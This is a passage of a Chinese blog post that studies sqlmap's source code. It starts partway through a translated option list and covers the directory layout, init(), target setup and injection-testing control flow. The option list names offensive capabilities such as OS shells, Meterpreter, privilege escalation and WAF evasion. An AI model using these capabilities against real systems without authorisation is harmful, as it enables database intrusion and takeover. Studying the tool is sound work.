DBMS 文件系统中的文件</span><br><span class="line">    --file-write=FIL..  写入到后端 DBMS 文件系统中的文件</span><br><span class="line">    --file-dest=FILE..  使用绝对路径写入到后端 DBMS 中的文件</span><br><span class="line">​</span><br><span class="line">  访问操作系统：</span><br><span class="line">    以下选项用于访问后端 DBMS 的底层操作系统</span><br><span class="line">​</span><br><span class="line">    --os-cmd=OSCMD      执行操作系统命令</span><br><span class="line">    --os-shell          调出交互式操作系统 shell</span><br><span class="line">    --os-pwn            调出 OOB shell，Meterpreter 或 VNC</span><br><span class="line">    --os-smbrelay       一键调出 OOB shell，Meterpreter 或 VNC</span><br><span class="line">    --os-bof            利用存储过程的缓冲区溢出</span><br><span class="line">    --priv-esc          数据库进程用户提权</span><br><span class="line">    --msf-path=MSFPATH  Metasploit 框架的本地安装路径</span><br><span class="line">    --tmp-path=TMPPATH  远程临时文件目录的绝对路径</span><br><span class="line">​</span><br><span class="line">  访问 Windows 注册表：</span><br><span class="line">    以下选项用于访问后端 DBMS 的 Windows 注册表</span><br><span class="line">​</span><br><span class="line">    --reg-read          读取一个 Windows 注册表键值</span><br><span class="line">    --reg-add           写入一个 Windows 注册表键值数据</span><br><span class="line">    --reg-del           删除一个 Windows 注册表键值</span><br><span class="line">    --reg-key=REGKEY    指定 Windows 注册表键</span><br><span class="line">    --reg-value=REGVAL  指定 Windows 注册表键值</span><br><span class="line">    --reg-data=REGDATA  指定 Windows 注册表键值数据</span><br><span class="line">    --reg-type=REGTYPE  指定 Windows 注册表键值类型</span><br><span class="line">​</span><br><span class="line">  通用选项：</span><br><span class="line">    以下选项用于设置通用的参数</span><br><span class="line">​</span><br><span class="line">    -s SESSIONFILE      从文件（.sqlite）中读入会话信息</span><br><span class="line">    -t TRAFFICFILE      保存所有 HTTP 流量记录到指定文本文件</span><br><span class="line">    --batch             从不询问用户输入，使用默认配置</span><br><span class="line">    --binary-fields=..  具有二进制值的结果字段（例如：&quot;digest&quot;）</span><br><span class="line">    --check-internet    在访问目标之前检查是否正常连接互联网</span><br><span class="line">    --crawl=CRAWLDEPTH  从目标 URL 开始爬取网站</span><br><span class="line">    --crawl-exclude=..  用正则表达式筛选爬取的页面（例如：&quot;logout&quot;）</span><br><span class="line">    --csv-del=CSVDEL    指定输出到 CVS 文件时使用的分隔符（默认为“,”）</span><br><span class="line">    --charset=CHARSET   指定 SQL 盲注字符集（例如：&quot;0123456789abcdef&quot;）</span><br><span class="line">    --dump-format=DU..  导出数据的格式（CSV（默认），HTML 或 SQLITE）</span><br><span class="line">    --encoding=ENCOD..  指定获取数据时使用的字符编码（例如：GBK）</span><br><span class="line">    --eta               显示每个结果输出的预计到达时间</span><br><span class="line">    --flush-session     清空当前目标的会话文件</span><br><span class="line">    --forms             解析并测试目标 URL 的表单</span><br><span class="line">    --fresh-queries     忽略存储在会话文件中的查询结果</span><br><span class="line">    --har=HARFILE       将所有 HTTP 流量记录到一个 HAR 文件中</span><br><span class="line">    --hex               获取数据时使用 hex 转换</span><br><span class="line">    --output-dir=OUT..  自定义输出目录路径</span><br><span class="line">    --parse-errors      从响应中解析并显示 DBMS 错误信息</span><br><span class="line">    --preprocess=PRE..  使用给定脚本预处理响应数据</span><br><span class="line">    --repair            重新导出具有未知字符的数据（?）</span><br><span class="line">    --save=SAVECONFIG   将选项设置保存到一个 INI 配置文件</span><br><span class="line">    --scope=SCOPE       用正则表达式从提供的代理日志中过滤目标</span><br><span class="line">    --test-filter=TE..  根据 payloads 和/或标题（例如：ROW）选择测试</span><br><span class="line">    --test-skip=TEST..  根据 payloads 和/或标题（例如：BENCHMARK）跳过部分测试</span><br><span class="line">    --update            更新 sqlmap</span><br><span class="line">​</span><br><span class="line">  杂项：</span><br><span class="line">    -z MNEMONICS        使用短助记符（例如：“flu,bat,ban,tec=EU”）</span><br><span class="line">    --alert=ALERT       在找到 SQL 注入时运行 OS 命令</span><br><span class="line">    --answers=ANSWERS   设置预定义回答（例如：“quit=N,follow=N”）</span><br><span class="line">    --beep              出现问题提醒或在发现 SQL 注入时发出提示音</span><br><span class="line">    --cleanup           指定移除 DBMS 中的特定的 UDF 或者数据表</span><br><span class="line">    --dependencies      检查 sqlmap 缺少（可选）的依赖</span><br><span class="line">    --disable-coloring  关闭彩色控制台输出</span><br><span class="line">    --gpage=GOOGLEPAGE  指定页码使用 Google dork 结果</span><br><span class="line">    --identify-waf      针对 WAF/IPS 防护进行彻底的测试</span><br><span class="line">    --mobile            使用 HTTP User-Agent 模仿智能手机</span><br><span class="line">    --offline           在离线模式下工作（仅使用会话数据）</span><br><span class="line">    --purge             安全删除 sqlmap data 目录所有内容</span><br><span class="line">    --skip-waf          跳过启发式检测 WAF/IPS 防护</span><br><span class="line">    --smart             只有在使用启发式检测时才进行彻底的测试</span><br><span class="line">    --sqlmap-shell      调出交互式 sqlmap shell</span><br><span class="line">    --tmp-dir=TMPDIR    指定用于存储临时文件的本地目录</span><br><span class="line">    --web-root=WEBROOT  指定 Web 服务器根目录（例如：&quot;/var/www&quot;）</span><br><span class="line">    --wizard            适合初级用户的向导界面</span><br></pre></td></tr></table></figure>

<h2 id="目录结构"><a href="#目录结构" class="headerlink" title="目录结构"></a>目录结构</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">.</span><br><span class="line">├── data  //数据库注入检测荷载、用户自定义攻击荷载、字典、shell命令、数据库触发顺序</span><br><span class="line">├── doc </span><br><span class="line">├── extra  //额外功能：运行cmd、shellcode等</span><br><span class="line">├── lib  //Sqlmap的连接库，注入请求的参数、提权操作等</span><br><span class="line">├── LICENSE</span><br><span class="line">├── plugins  //各种数据库信息和数据库通用事项</span><br><span class="line">├── README.md</span><br><span class="line">├── sqlmapapi.py  //sqlmap的api文件</span><br><span class="line">├── sqlmapapi.yaml  //sqlmap的api文档</span><br><span class="line">├── sqlmap.conf  //sqlmap配置文件</span><br><span class="line">├── sqlmap.py  //sqlmap主程序文件</span><br><span class="line">├── tamper  //绕过脚本</span><br><span class="line">└── thirdparty  //第三方插件</span><br></pre></td></tr></table></figure>

<h2 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h2><p>Sqlmap版本：1.5.11.9#dev</p>
<p><strong>ps</strong>：刚开始看的时候用的VScode，后面换了Pycharm，前后截图看着难受的见谅= =</p>
<h3 id="sqlmap-py"><a href="#sqlmap-py" class="headerlink" title="sqlmap.py"></a>sqlmap.py</h3><p>程序初始化以后，main()函数首先执行了五个函数</p>
<h4 id="dirtyPatches"><a href="#dirtyPatches" class="headerlink" title="dirtyPatches()"></a>dirtyPatches()</h4><p>对于程序中一些问题的处理和修复</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211120191640212.png" alt="image-20211120191640212"></p>
<ul>
<li>设置<a href="https://cloud.tencent.com/developer/section/1368319">httplib</a>最大长度来接收长结果行</li>
<li>在sqlmap分块的情况下防止双分块编码</li>
<li>在 Windows 操作系统上添加对 <strong>inet_pton()</strong> 的支持（inet_pton()为IP地址转换函数），然后编码替换把cp65001替换为UTF-8</li>
<li>在二进制数据检索的情况下防止过多的“guessing”</li>
<li>…</li>
</ul>
<p>对sqlmap的功能影响似乎不是很大，可能是为了优化体验和进行一些基本设置</p>
<h4 id="resolveCrossReferences"><a href="#resolveCrossReferences" class="headerlink" title="resolveCrossReferences()"></a>resolveCrossReferences()</h4><p>解决模块的交叉引用问题</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211120194950636.png" alt="image-20211120194950636"></p>
<p>对一些子程序中的函数进行重写赋值来消除交叉引用问题</p>
<h4 id="checkEnvironment"><a href="#checkEnvironment" class="headerlink" title="checkEnvironment()"></a>checkEnvironment()</h4><p>环境检测函数</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211120195101916.png" alt="image-20211120195101916"></p>
<p>调用**modulePath()**获取程序路径，判断程序是否被py2exe（py2exe是一个将python脚本转换成windows上的可独立执行的可执行程序的工具）打包成了exe，打包后将无法用file获取文件路径。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211120201307980.png" alt="image-20211120201307980"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211120201332414.png" alt="image-20211120201332414"></p>
<p>用**getUnicode()**返回unicode编码路径，防止乱码。</p>
<p>用**LooseVersion()**判断python版本，python版本过低则报错退出</p>
<p>导入对pip安装环境的补丁，设置了一些系统环境变量</p>
<h4 id="setPaths"><a href="#setPaths" class="headerlink" title="setPaths()"></a>setPaths()</h4><p>配置Sqlmap文件和目录的绝对路径</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123184314072.png" alt="image-20211123184314072"></p>
<p>判断扩展名为”.txt”, “.xml”, “.tx_”的文件是否存在并且可读</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123184334026.png" alt="image-20211123184334026"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123184419708.png" alt="image-20211123184419708"></p>
<p>paths的值为Sqlmap自定义的一个字典类型AttribDict<strong>（这块不是很懂）</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># sqlmap paths</span><br><span class="line">paths = AttribDict()</span><br></pre></td></tr></table></figure>

<blockquote>
<p>This class defines the dictionary with added capability to access members as attributes</p>
<p>此类定义了具有访问成员作为属性的附加功能的字典</p>
<p>就是说可以通过访问属性的方式来访问键值</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123185342627.png" alt="image-20211123185342627"></p>
<p>其中定义了<code>__deepcopy__</code>，为了解决字典赋值传递后<strong>浅拷贝</strong>会修改原数据的问题</p>
<blockquote>
<ul>
<li><strong>直接赋值：</strong>其实就是对象的引用（别名）。</li>
<li><strong>浅拷贝(copy)：</strong>拷贝父对象，不会拷贝对象的内部的子对象。</li>
<li><strong>深拷贝(deepcopy)：</strong> copy 模块的 deepcopy 方法，完全拷贝了父对象及其子对象。</li>
</ul>
</blockquote>
<h4 id="banner"><a href="#banner" class="headerlink" title="banner()"></a>banner()</h4><p>函数判断执行参数中是否包含”–version”或者”–api”参数，或者在配置中是否将disableBanner设置为True，没有就将BANNER字符串赋值给 <strong>“_”</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123192427780.png" alt="image-20211123192427780"></p>
<p><strong>BANNER</strong>就是Sqlmap开始运行时打印出来的字符画</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123192506396.png" alt="image-20211123192506396"></p>
<h4 id="五个函数执行之后的流程"><a href="#五个函数执行之后的流程" class="headerlink" title="五个函数执行之后的流程"></a>五个函数执行之后的流程</h4><p>接下来是对命令行参数的操作</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123195358545.png" alt="image-20211123195358545"></p>
<p><strong>cmdLineParse()<strong>：该函数解析命令行参数和实参。使用了<a href="https://docs.python.org/zh-cn/3/library/argparse.html#module-argparse"><code>argparse</code></a> — 命令行选项、参数和子命令解析器。将获取的命令行参数选项进行判断、拆分转变成dict键值对的形式存入</strong>cmdLineOptions</strong>(为一个<strong>AttribDict()</strong>)。</p>
<p>接着<strong>cmdLineOptions</strong>传入<strong>initOptions()</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123200106597.png" alt="image-20211123200106597"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">_setConfAttributes()  //初始化某些属性值为空</span><br><span class="line">_setKnowledgeBaseAttributes()  //初始化某些属性值到&quot;知识库&quot;中</span><br><span class="line">_mergeOptions(inputOptions, overrideOptions)  //将配置项中的参数和命令行获得的参数选项以及缺省选项进行合并，函数执行完毕将会将字典 mergedOptions 的值进行更新</span><br></pre></td></tr></table></figure>



<p>判断是否标准输入</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123200913831.png" alt="image-20211123200913831"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123201300160.png" alt="image-20211123201300160"></p>
<p>判断是否调用api，如果是将会引入几个新的包，并覆盖系统标准输出和标准错误</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123201548376.png" alt="image-20211123201548376"></p>
<p>判断过后打印法律声明和时间</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211123201709718.png" alt="image-20211123201709718"></p>
<p>接着执行init()函数，该函数定义在<strong>lib/core/option.py</strong></p>
<p>注释写的是：将属性设置为配置和知识库单例，基于命令行和配置文件选项。具体分析于下文。</p>
<p>之后执行两个测试函数smokeTest、vulnTest。不测试则导入包，判断<strong>conf.profile</strong>，其中**profile()**的作用写的是：以图形显示分析数据，不是很理解到底干了啥</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211124151442667.png" alt="image-20211124151442667"></p>
<p><strong>conf.profile</strong>默认为空，直接到<strong>else</strong>部分</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211124152338670.png" alt="image-20211124152338670"></p>
<p>在<strong>if</strong>判断中</p>
<blockquote>
<p>#Crawl the website starting from the target URL.</p>
<p>conf.crawlDepth = 0</p>
<p># Scan multiple targets enlisted in a given textual file</p>
<p>bulkFile = </p>
</blockquote>
<p>首次运行<strong>if</strong>判断条件不成立，直接执行start()，start()单独分析。</p>
<p>接下来一堆<strong>except</strong>就不分析了。</p>
<p><strong>finally</strong>中主要是给出一些提示信息（例如：<code>&quot;your sqlmap version is outdated&quot;</code>）、清除临时目录、清除线程、清除配置等文件。</p>
<p>在最后判断命令行参数中是否存在<code>sqlmapShell</code>，如果有清除一波以后再次执行**main()**。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211124154720290.png" alt="image-20211124154720290"></p>
<h3 id="option-py"><a href="#option-py" class="headerlink" title="option.py"></a>option.py</h3><p>命令行参数处理</p>
<h4 id="init"><a href="#init" class="headerlink" title="init()"></a>init()</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">注释Google翻译：</span><br><span class="line">--将属性设置为配置和知识库单例</span><br><span class="line">--基于命令行和配置文件选项。</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">init</span>():</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Set attributes into both configuration and knowledge base singletons</span></span><br><span class="line"><span class="string">    based upon command line and configuration file options.</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    _useWizardInterface() <span class="comment">#为初学者提供简单的向导界面 开头用法中的 --wizard</span></span><br><span class="line">    setVerbosity() <span class="comment">#此函数设置 sqlmap 输出消息的详细程度  详见：置顶手册-&gt;用法-&gt;输出详细等级</span></span><br><span class="line">    _saveConfig() <span class="comment">#将命令行选项保存为sqlmap配置ini文件格式</span></span><br><span class="line">    _setRequestFromFile() <span class="comment">#从文件中设置http请求 -r</span></span><br><span class="line">    _cleanupOptions()  <span class="comment">#清除配置选项</span></span><br><span class="line">    _cleanupEnvironment() <span class="comment">#清理环境（例如，--shell后的残留）</span></span><br><span class="line">    _purge() <span class="comment">#安全删除（清除）sqlmap 数据目录</span></span><br><span class="line">    _checkDependencies() <span class="comment">#检测丢失的依赖</span></span><br><span class="line">    _createHomeDirectories() <span class="comment">#在sqlmap的主目录中创建目录</span></span><br><span class="line">    _createTemporaryDirectory() <span class="comment">#为这次运行创建临时目录</span></span><br><span class="line">    _basicOptionValidation() <span class="comment">#检查选项是否有效</span></span><br><span class="line">    _setProxyList() <span class="comment">#设置代理列表 --proxy</span></span><br><span class="line">    _setTorProxySettings() //设置Tor代理 --tor</span><br><span class="line">    _setDNSServer() <span class="comment">#设置DNS服务器 --dns-domain</span></span><br><span class="line">    _adjustLoggingFormatter() <span class="comment">#用于解决推理模式下日志信息和检索数据信息重叠导致的行删除问题</span></span><br><span class="line">    _setMultipleTargets() <span class="comment">#多目标模式下运行，只定义一个配置参数</span></span><br><span class="line">    _listTamperingFunctions() <span class="comment">#列出可用的Tamper功能</span></span><br><span class="line">    _setTamperingFunctions() <span class="comment">#设置Tamper脚本 --temper</span></span><br><span class="line">    _setPreprocessFunctions() <span class="comment">#从给定脚本加载预处理功能 --preprocess</span></span><br><span class="line">    _setPostprocessFunctions() <span class="comment">#从给定脚本加载后处理功能</span></span><br><span class="line">    _setTrafficOutputFP() <span class="comment">#设置记录http日志</span></span><br><span class="line">    _setupHTTPCollector() <span class="comment">#设置http收集器</span></span><br><span class="line">    _setHttpChunked() <span class="comment">#设置http chunked编码</span></span><br><span class="line">    _checkWebSocket() <span class="comment">#检测websocket-client模块调用</span></span><br><span class="line">    parseTargetDirect() <span class="comment">#解析目标 dbms 并将一些属性设置到配置中</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">any</span>((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.stdinPipe)):</span><br><span class="line">    <span class="comment">#如果设置了上述内容则配置http</span></span><br><span class="line">        _setHostname() <span class="comment">#设置hostname</span></span><br><span class="line">        _setHTTPTimeout() <span class="comment">#设置超时</span></span><br><span class="line">        _setHTTPExtraHeaders() <span class="comment">#设置headers</span></span><br><span class="line">        _setHTTPCookies() <span class="comment">#设置Cookie</span></span><br><span class="line">        _setHTTPReferer() <span class="comment">#设置Referer</span></span><br><span class="line">        _setHTTPHost() <span class="comment">#设置Host</span></span><br><span class="line">        _setHTTPUserAgent() <span class="comment">#设置UserAgent</span></span><br><span class="line">        _setHTTPAuthentication() <span class="comment">#设置Authentication</span></span><br><span class="line">        _setHTTPHandlers() <span class="comment">#检查并设置所有 HTTP 请求的 HTTP/SOCKS 代理</span></span><br><span class="line">        _setDNSCache() <span class="comment">#设置DNSCache（具体作用可以百度一下，和缓存差不多）</span></span><br><span class="line">        _setSocketPreConnect() <span class="comment">#创建socket.create_connection 的预连接</span></span><br><span class="line">        _setSafeVisit() <span class="comment">#检查并设置安全访问选项</span></span><br><span class="line">        _doSearch() <span class="comment">#使用搜索引擎搜索并存储结果</span></span><br><span class="line">        _setStdinPipeTargets() <span class="comment">#使用标准输入解析目标列表</span></span><br><span class="line">        _setBulkMultipleTargets() <span class="comment">#从指定的批量文件解析多个目标</span></span><br><span class="line">        _checkTor() <span class="comment">#检查Tor代理</span></span><br><span class="line">        _setCrawler() <span class="comment">#设置爬虫</span></span><br><span class="line">        _findPageForms() <span class="comment">#查找页面表单</span></span><br><span class="line">        _setDBMS() <span class="comment">#强制设置DBMS --dbms</span></span><br><span class="line">        _setTechnique() <span class="comment">#设置注入技术 --technique 详见上文&quot;用法&quot;部分</span></span><br><span class="line"></span><br><span class="line">    _setThreads() <span class="comment">#设置线程</span></span><br><span class="line">    _setOS() <span class="comment">#强制设置系统</span></span><br><span class="line">    _setWriteFile() <span class="comment">#写入文件</span></span><br><span class="line">    _setMetasploit() <span class="comment">#设置Metasploit</span></span><br><span class="line">    _setDBMSAuthentication() <span class="comment">#设置DBMS验证（身份认证）</span></span><br><span class="line">    loadBoundaries() <span class="comment">#加载Boundaries</span></span><br><span class="line">    loadPayloads() <span class="comment">#加载Payloads</span></span><br><span class="line">    _setPrefixSuffix() </span><br><span class="line">    update() <span class="comment">#更新sqlmap</span></span><br><span class="line">    _loadQueries() <span class="comment">#从 &#x27;xml/queries.xml&#x27; file.loadQueries 加载查询</span></span><br></pre></td></tr></table></figure>

<h3 id="controller-py"><a href="#controller-py" class="headerlink" title="controller.py"></a>controller.py</h3><h4 id="start"><a href="#start" class="headerlink" title="start()"></a>start()</h4><p>该函数对URL稳定性，所有GET、POST、Cookie和User-Agent参数进行检查，检查它们是否动态且受到Sql注入影响</p>
<p>创建hashFile。</p>
<h4 id="conf-direct-True"><a href="#conf-direct-True" class="headerlink" title="conf.direct = True"></a>conf.direct = True</h4><p><strong>conf.direct <strong>当参数存在 -d（直接连接数据库）时为</strong>True</strong>，否则将绕过直接走下面的步骤</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211127183902435.png" alt="image-20211127183902435"></p>
<p><strong>initTargetEnv()</strong></p>
<p>初始化目标环境，完成全局变量 conf 和 kb 的初始化工作（是否有自定义注入点，是否指定数据库）</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">initTargetEnv</span>():</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Initialize target environment.</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> conf.multipleTargets:</span><br><span class="line">        <span class="keyword">if</span> conf.hashDB:</span><br><span class="line">            conf.hashDB.close()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> conf.cj:</span><br><span class="line">            resetCookieJar(conf.cj)</span><br><span class="line"></span><br><span class="line">        threadData = getCurrentThreadData()</span><br><span class="line">        threadData.reset()</span><br><span class="line"></span><br><span class="line">        conf.paramDict = &#123;&#125;</span><br><span class="line">        conf.parameters = &#123;&#125;</span><br><span class="line">        conf.hashDBFile = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">        _setKnowledgeBaseAttributes(<span class="literal">False</span>)</span><br><span class="line">        _restoreMergedOptions()</span><br><span class="line">        _setDBMS() <span class="comment">#强制设置DBMS</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> conf.data:</span><br><span class="line">        <span class="class"><span class="keyword">class</span> <span class="title">_</span>(<span class="params">six.text_type</span>):</span></span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">        kb.postUrlEncode = <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> key, value <span class="keyword">in</span> conf.httpHeaders:</span><br><span class="line">            <span class="keyword">if</span> key.upper() == HTTP_HEADER.CONTENT_TYPE.upper():</span><br><span class="line">                kb.postUrlEncode = <span class="string">&quot;urlencoded&quot;</span> <span class="keyword">in</span> value</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> kb.postUrlEncode:</span><br><span class="line">        <span class="comment">#如果有urlencode会进行urldecode操作</span></span><br><span class="line">            original = conf.data</span><br><span class="line">            conf.data = _(urldecode(conf.data))</span><br><span class="line">            <span class="built_in">setattr</span>(conf.data, UNENCODED_ORIGINAL_VALUE, original)</span><br><span class="line">            kb.postSpaceToPlus = <span class="string">&#x27;+&#x27;</span> <span class="keyword">in</span> original</span><br><span class="line"></span><br><span class="line">    match = re.search(INJECT_HERE_REGEX, <span class="string">&quot;%s %s %s&quot;</span> % (conf.url, conf.data, conf.httpHeaders))</span><br><span class="line">    kb.customInjectionMark = match.group(<span class="number">0</span>) <span class="keyword">if</span> match <span class="keyword">else</span> CUSTOM_INJECTION_MARK_CHAR</span><br><span class="line">    <span class="comment">#CUSTOM_INJECTION_MARK_CHAR = &#x27;*&#x27;自定义注入标记字符</span></span><br><span class="line">    <span class="comment">#INJECT_HERE_REGEX = r&quot;(?i)%INJECT[_ ]?HERE%&quot;</span></span><br></pre></td></tr></table></figure>



<p><strong>setupTargetEnv()</strong></p>
<p>设置目标环境</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">setupTargetEnv</span>():</span></span><br><span class="line">    _createTargetDirs() <span class="comment">#创建输出目录</span></span><br><span class="line">    _setRequestParams() </span><br><span class="line">    <span class="comment">#检查、设置参数GET参数，还有POST中的--data内容</span></span><br><span class="line">    <span class="comment">#检测注入标记字符，是否测试自定义注入点</span></span><br><span class="line">    <span class="comment">#接下来基于注入标记一堆交互操作进行测试</span></span><br><span class="line">    _setHashDB()</span><br><span class="line">    _resumeHashDBValues()</span><br><span class="line">    _setResultsFile() <span class="comment">#创建用于存储多目标模式运行结果的文件</span></span><br><span class="line">    _setAuthCred() <span class="comment">#将当前目标的身份验证凭据添加到密码管理器（由连接处理程序使用）</span></span><br><span class="line">    _setAuxOptions() </span><br></pre></td></tr></table></figure>



<p><strong>action()</strong></p>
<p>函数用于在受影响的URL参数上执行SQL注入攻击，并尝试提取 DBMS 或 操作系统相关信息</p>
<p>conf.direct = False</p>
<p>在没有直连数据库的情况下，将配置文件中的url、method、data、cookie添加到<strong>kb.targets</strong>中，接着判断如果不存在目标则报错，存在目标则打印出目标数</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211127194659375.png" alt="image-20211127194659375"></p>
<p>判断网络连接状况，打印错误信息</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211127200035159.png" alt="image-20211127200035159"></p>
<p>设置Http连接参数</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">initTargetEnv() //详见上文parseTargetUrl() //解析url获取信息（hostname、scheme...）</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211127200336549.png" alt="image-20211127200336549"></p>
<p><strong>kb.testedParams</strong>用于保存测试过的url参数信息，通过这个来判断url是否进行过test并且是否为注入点等，再来对<strong>testSqlinj</strong>进行修改，最后判断是否要跳过这个点</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211127201921315.png" alt="image-20211127201921315"></p>
<p>接下来判断是否存在多目标，依次交互来确认是否进行测试。</p>
<p>**setupTargetEnv()**上文有不继续讲了（可能讲的不对= =）</p>
<p>检查连接、是否有用户自定义的字符或者正则，即</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">CUSTOM_INJECTION_MARK_CHAR = &#x27;*&#x27; //自定义注入标记字符INJECT_HERE_REGEX = r&quot;(?i)%INJECT[_ ]?HERE%&quot; //正则</span><br></pre></td></tr></table></figure>

<p>**checkWaf()**，详见下文分析</p>
<p><strong>checkNullConnection()<strong>可以参考一下<a href="http://www.wisec.it/sectou.php?id=472f952d79293">链接</a>。大概就是在进行盲注时，不用获取整个页面响应主体内容，但能通过类似</strong>Content-Length header</strong>知道内容长度，以此来节省带宽的一种操作。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211130203726347.png" alt="image-20211130203726347"></p>
<p><strong>checkStability()<strong>用于检查URL稳定性，两次请求同一页面并在两次访问中带有延迟来确保稳定，如果两次请求的内容有差异（动态页面）则通过</strong>–string</strong>来判断是否为同一页面，接着对参数列表和测试列表进行排序。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211130204237981.png" alt="image-20211130204237981"></p>
<p>根据用户选择的**–level**来判断是否进行cookie、referer、ua的注入以及参数的跳过</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211206140046839.png" alt="image-20211206140046839"></p>
<p>其中557行处的**checkDynParam()**函数判断参数是否是动态，如果不是动态则需要选取其他参数。其核心是给参数另外一个随机值，然后通过选择参数及对于页面的各种规则的判断，计算出两个页面的相似比率，来判定是否为动态。</p>
<p>如果参数为动态，进入SQL注入测试，调用**heuristcCheckSqlInjection()**函数进行启发式检测，函数分析见下文。</p>
<p>得到<strong>POSITIVE</strong>结果后调用<strong>checkSqlInjection()<strong>进行注入点检查，再次确定有漏洞并且非</strong>FALSE_POSTTIVE</strong>，会设置injectable 设为True（可注入），中间产的数据会放入数据集中</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211206140706106.png" alt="image-20211206140706106"></p>
<p>没有检测出漏洞点的情况下，会根据情况提供建议参数</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211206140954358.png" alt="image-20211206140954358"></p>
<p>否则讲结果进行保存</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211206141110043.png" alt="image-20211206141110043"></p>
<p>确认有注入点后，会与用户进行交互确认，执行**action()**函数。</p>
<p>下面是except异常处理，不细说。</p>
<p>显示http错误代码，提示最大连接限制</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211206141446717.png" alt="image-20211206141446717"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211206141544427.png" alt="image-20211206141544427"></p>
